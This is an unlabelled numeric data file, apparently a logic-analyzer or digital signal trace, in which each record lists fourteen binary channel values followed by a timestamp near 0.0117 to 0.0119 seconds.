1,0,0,1,0,1,0,0,0,1,0,0,1,0,1.1744872e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1744896e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1744904e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1744948e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1744972e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1745020e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1745044e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1745072e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1745096e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1745124e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1745148e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1745196e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1745220e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1745272e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1745296e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1745300e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,1.1745348e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1745372e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1745380e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1745420e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1745444e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1745496e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1745524e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1745548e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1745572e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1745576e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,1.1745620e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1745644e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1745652e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1745672e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1745696e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1745724e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1745748e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1745772e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1745796e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1745820e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1745844e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1745852e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,1.1745896e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1745924e-02 1,0,0,1,0,1,0,0,0,0,0,0,0,0,1.1745928e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1745932e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1745948e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1745972e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1745976e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,1.1746020e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1746044e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1746052e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1746072e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1746096e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1746124e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1746148e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1746172e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1746196e-02 1,0,0,1,0,0,0,0,0,1,0,0,0,0,1.1746200e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1746204e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,1.1746220e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1746244e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1746252e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1746300e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1746324e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1746348e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1746372e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1746376e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,1.1746396e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1746420e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1746428e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1746472e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1746496e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1746548e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1746572e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1746620e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1746644e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1746696e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1746724e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,1.1746748e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1746772e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1746780e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1746796e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1746820e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1746828e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,1.1746872e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1746896e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1746904e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1746924e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1746948e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1746972e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1746996e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1747020e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1747044e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1747076e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1747108e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,1.1747156e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.1747180e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1747188e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1747204e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1747232e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1747256e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1747284e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1747308e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1747332e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1747356e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1747380e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1747404e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1747432e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1747456e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1747484e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1747508e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1747532e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1747556e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1747580e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1747604e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1747632e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1747656e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1747684e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1747708e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1747732e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1747756e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1747780e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1747804e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1747832e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1747856e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1747884e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1747908e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1747932e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1747956e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1747980e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.1748004e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.1748032e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,1,1.1871768e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,1.1871948e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,1,1.1871968e-02 0,1,0,1,0,0,0,0,0,0,0,1,0,1,1.1871988e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,1,1.1872016e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,1,1.1872300e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,1,1.1872324e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,1,1.1872328e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,1,1.1872348e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,1,1.1872372e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,1,1.1872396e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,1,1.1872424e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,1,1.1872448e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,1,1.1872476e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,1,1.1872500e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,1,1.1872524e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,1,1.1872532e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,1,1.1872548e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,1,1.1872572e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,1,1.1872596e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1872600e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1872624e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1872652e-02 0,1,0,1,0,0,0,0,0,1,0,0,0,0,1.1872676e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1872680e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.1872700e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1872724e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.1872748e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1872772e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.1872800e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1872824e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.1872852e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1872876e-02 0,1,0,1,0,1,0,0,0,0,0,0,0,0,1.1872880e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1872884e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1872900e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1872924e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1872948e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1872972e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1873000e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1873024e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1873028e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.1873052e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1873076e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.1873100e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1873124e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.1873148e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1873172e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.1873200e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1873224e-02 0,1,0,1,0,1,0,0,0,0,0,0,0,0,1.1873228e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1873232e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1873252e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1873276e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1873300e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1873324e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1873348e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1873372e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1873380e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.1873400e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1873424e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.1873452e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1873476e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.1873500e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1873524e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.1873548e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1873572e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1873580e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1873600e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1873624e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1873652e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1873676e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1873724e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1873748e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1873800e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1873824e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1873876e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1873900e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1873948e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1873972e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1874024e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1874052e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1874100e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1874124e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1874148e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1874172e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1874180e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.1874200e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1874224e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.1874252e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1874276e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.1874300e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1874324e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.1874348e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1874372e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.1874400e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1874424e-02 0,1,0,1,0,1,0,0,0,0,0,0,0,0,1.1874428e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1874432e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1874452e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1874476e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1874500e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1874524e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1874548e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1874572e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1874600e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1874624e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1874652e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1874676e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1874700e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1874724e-02 0,1,0,1,0,0,0,0,0,1,0,0,0,0,1.1874728e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1874732e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.1874748e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1874772e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1874780e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1874800e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1874824e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1874852e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1874876e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1874900e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1874924e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1874928e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.1874948e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1874972e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.1875000e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1875024e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.1875052e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1875076e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.1875100e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1875124e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1875132e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1875148e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1875172e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1875200e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1875224e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1875276e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1875300e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1875348e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1875372e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1875424e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1875452e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1875500e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1875524e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1875572e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1875600e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1875652e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1875676e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1875700e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1875724e-02 0,1,0,1,0,0,0,0,0,1,0,0,0,0,1.1875728e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1875732e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.1875748e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1875772e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1875780e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1875800e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1875824e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1875828e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.1875852e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1875876e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.1875900e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1875924e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.1875948e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1875972e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1875980e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1876000e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1876024e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1876052e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1876076e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1876100e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1876124e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1876128e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.1876148e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1876172e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.1876200e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1876224e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.1876252e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1876276e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.1876300e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1876324e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.1876348e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1876372e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1876380e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1876400e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1876424e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1876452e-02 0,1,0,1,0,0,0,0,0,1,0,0,0,0,1.1876476e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1876480e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.1876500e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1876524e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.1876548e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1876572e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.1876600e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1876624e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.1876652e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1876676e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.1876700e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1876724e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1876732e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1876748e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1876772e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1876780e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.1876800e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1876824e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1876828e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1876852e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1876876e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1876900e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1876924e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1876948e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1876972e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1877000e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1877024e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1877028e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.1877052e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1877076e-02 0,1,0,1,0,1,0,0,0,0,0,0,0,0,1.1877080e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1877084e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1877100e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1877124e-02 0,1,0,1,0,0,0,0,0,1,0,0,0,0,1.1877128e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1877132e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.1877148e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1877172e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1877180e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1877200e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1877224e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1877252e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1877276e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1877300e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1877324e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1877348e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1877372e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1877380e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.1877400e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1877424e-02 0,1,0,1,0,1,0,0,0,0,0,0,0,0,1.1877428e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1877432e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1877452e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1877476e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1877500e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1877524e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1877528e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.1877548e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1877572e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.1877600e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1877624e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.1877652e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1877676e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.1877700e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1877724e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1877732e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1877748e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1877772e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1877800e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1877824e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1877828e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.1877852e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1877876e-02 0,1,0,1,0,1,0,0,0,0,0,0,0,0,1.1877880e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1877884e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1877900e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1877924e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1877948e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1877972e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1878000e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1878024e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1878052e-02 0,1,0,1,0,0,0,0,0,1,0,0,0,0,1.1878076e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1878080e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.1878100e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.1878124e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1878132e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1878148e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1878172e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1878200e-02 